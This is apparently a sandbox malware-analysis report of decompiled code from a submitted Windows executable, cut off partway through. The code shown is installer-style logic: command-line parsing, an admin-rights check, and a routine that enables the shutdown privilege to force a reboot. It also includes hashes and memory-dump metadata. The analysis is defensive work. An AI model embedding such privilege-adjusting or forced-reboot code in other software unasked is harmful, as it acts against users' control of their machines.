                                                                                                                                                                                                        0x00e8615e
                                                                                                                                                                                                        0x00e86160
                                                                                                                                                                                                        0x00e8616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8616a
                                                                                                                                                                                                        0x00e8615c
                                                                                                                                                                                                        0x00e8614a
                                                                                                                                                                                                        0x00e8610b
                                                                                                                                                                                                        0x00e8610e
                                                                                                                                                                                                        0x00e8610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85e59
                                                                                                                                                                                                        0x00e85e59
                                                                                                                                                                                                        0x00e85e5c
                                                                                                                                                                                                        0x00e8604f
                                                                                                                                                                                                        0x00e86056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8605c
                                                                                                                                                                                                        0x00e8606e
                                                                                                                                                                                                        0x00e86071
                                                                                                                                                                                                        0x00e86073
                                                                                                                                                                                                        0x00e86075
                                                                                                                                                                                                        0x00e86075
                                                                                                                                                                                                        0x00e86078
                                                                                                                                                                                                        0x00e86078
                                                                                                                                                                                                        0x00e8607a
                                                                                                                                                                                                        0x00e8607b
                                                                                                                                                                                                        0x00e86081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86087
                                                                                                                                                                                                        0x00e86087
                                                                                                                                                                                                        0x00e8608d
                                                                                                                                                                                                        0x00e8609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e860a2
                                                                                                                                                                                                        0x00e860aa
                                                                                                                                                                                                        0x00e860b2
                                                                                                                                                                                                        0x00e860b7
                                                                                                                                                                                                        0x00e860bd
                                                                                                                                                                                                        0x00e860bf
                                                                                                                                                                                                        0x00e860bf
                                                                                                                                                                                                        0x00e860d6
                                                                                                                                                                                                        0x00e860e0
                                                                                                                                                                                                        0x00e860e7
                                                                                                                                                                                                        0x00e860f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e860f5
                                                                                                                                                                                                        0x00e8609c
                                                                                                                                                                                                        0x00e86081
                                                                                                                                                                                                        0x00e85e62
                                                                                                                                                                                                        0x00e85e62
                                                                                                                                                                                                        0x00e85e65
                                                                                                                                                                                                        0x00e85fd3
                                                                                                                                                                                                        0x00e85fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85fef
                                                                                                                                                                                                        0x00e85fef
                                                                                                                                                                                                        0x00e85ff7
                                                                                                                                                                                                        0x00e85ffd
                                                                                                                                                                                                        0x00e86003
                                                                                                                                                                                                        0x00e86006
                                                                                                                                                                                                        0x00e86011
                                                                                                                                                                                                        0x00e86014
                                                                                                                                                                                                        0x00e8603d
                                                                                                                                                                                                        0x00e86016
                                                                                                                                                                                                        0x00e86018
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00E85CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00E88B3E,00000104,00000000,?,?), ref: 00E85DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E85E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00E85EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00E85F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E85FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00E86008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00E860AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00E81140,00000000,00000040,00000000), ref: 00E861F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00E861F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 6c4f826311729a978636fd27d3f3bf945fd3af270847a4caf7f11fe9e2e36429
                                                                                                                                                                                                        • Instruction ID: ede898b4140364962f68b2ea41bfef1feeb7008ad82d8a566a1bcc8e21750065
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c4f826311729a978636fd27d3f3bf945fd3af270847a4caf7f11fe9e2e36429
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3ED15C73A04A445EDF35BB398D487F67BA1A716308F5460EAC98EF6191DF708E868F01
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00E81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xe89a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00E844B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00E86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00E844B9(0, 0x522, 0xe81140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00E81EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00e81f8f
                                                                                                                                                                                                        0x00e81fcf
                                                                                                                                                                                                        0x00e81fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fd3
                                                                                                                                                                                                        0x00e81fa9
                                                                                                                                                                                                        0x00e81fb4
                                                                                                                                                                                                        0x00e81fbb
                                                                                                                                                                                                        0x00e81fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fc3
                                                                                                                                                                                                        0x00e81f9a
                                                                                                                                                                                                        0x00e81f9a
                                                                                                                                                                                                        0x00e81fa2
                                                                                                                                                                                                        0x00e81fd9
                                                                                                                                                                                                        0x00e81fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00E81EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E81F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00E81FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 6e5faa95dbae971791a7038045e92336af6fdbd927300b5f3057d74c69843256
                                                                                                                                                                                                        • Instruction ID: 320ef0b0adb9aa3b16214eecbdf5be2da06bb3e1c3fe4a4b59f03a813d7bed78
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e5faa95dbae971791a7038045e92336af6fdbd927300b5f3057d74c69843256
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8321A6B1B402056EEB207BA29C4AFBB76BCEF85B14F141069FB0EF6181D77488469761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00E817EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xe8a288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E818DD), ref: 00E8181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E8182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00E818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E818DD), ref: 00E81855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00E818DD), ref: 00E81883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00E818DD), ref: 00E8188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 648b3c6fa7f8222472892f282861510884fea01b7970b61615bdbeaf5879dba9
                                                                                                                                                                                                        • Instruction ID: 6ef39ce32a6e247c9657b8484f0741805dcd4dc377ef93d62468ddeeadce05bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 648b3c6fa7f8222472892f282861510884fea01b7970b61615bdbeaf5879dba9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80119671E00209AFEB14AFA5DC4AABEBB78EF44700F14016AFA0DF2290DA309D058791
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86CF0(char _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t1 =  &_a4; // 0xe86e26
                                                                                                                                                                                                        				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E86E26,00E81000), ref: 00E86CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(&n,?,00E86E26,00E81000), ref: 00E86D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00E86E26,00E81000), ref: 00E86D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00E86E26,00E81000), ref: 00E86D12
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID: &n
                                                                                                                                                                                                        • API String ID: 3231755760-661210962
                                                                                                                                                                                                        • Opcode ID: ed486db0fc49553d4656a74c014f27c9b0990a3a174d6c27754d04d6f57694dd
                                                                                                                                                                                                        • Instruction ID: 3b1daf1aa5239f92d3c24871e1f9d648f17eb68f46500a1cf1ed3801a8a313e0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed486db0fc49553d4656a74c014f27c9b0990a3a174d6c27754d04d6f57694dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BD0C9B2001108BFFB002BE2EC0CA693F28EB48612F4C4022F31DA2020CA3644558B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E87155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xe88004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe88004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xe88008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E87182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00E87191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E8719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00E871A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00E871B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: a535554ced4188ce74aaedb3c2edcd57798d6e94545b113108c6989c0f7d6b72
                                                                                                                                                                                                        • Instruction ID: 6940f62e103a3be2392c7790e9614b36be8a6d396a75393e38ad8f8daaeb248a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a535554ced4188ce74aaedb3c2edcd57798d6e94545b113108c6989c0f7d6b72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B111C71D06208DFDB10DFB9DA4CA9EBBF5EF48315FA54866D809F7214EB349A088B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00E83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00E843D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xe89a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe891e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00E844B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xe891e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xe891e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xe891e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xe891e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00E8658A(0xe891e4, 0x104, 0xe81140);
                                                                                                                                                                                                        								_t27 = E00E858C8(0xe891e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xe891e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xe891e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00E8597D(0xe891e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xe891e5 - 0x5c;
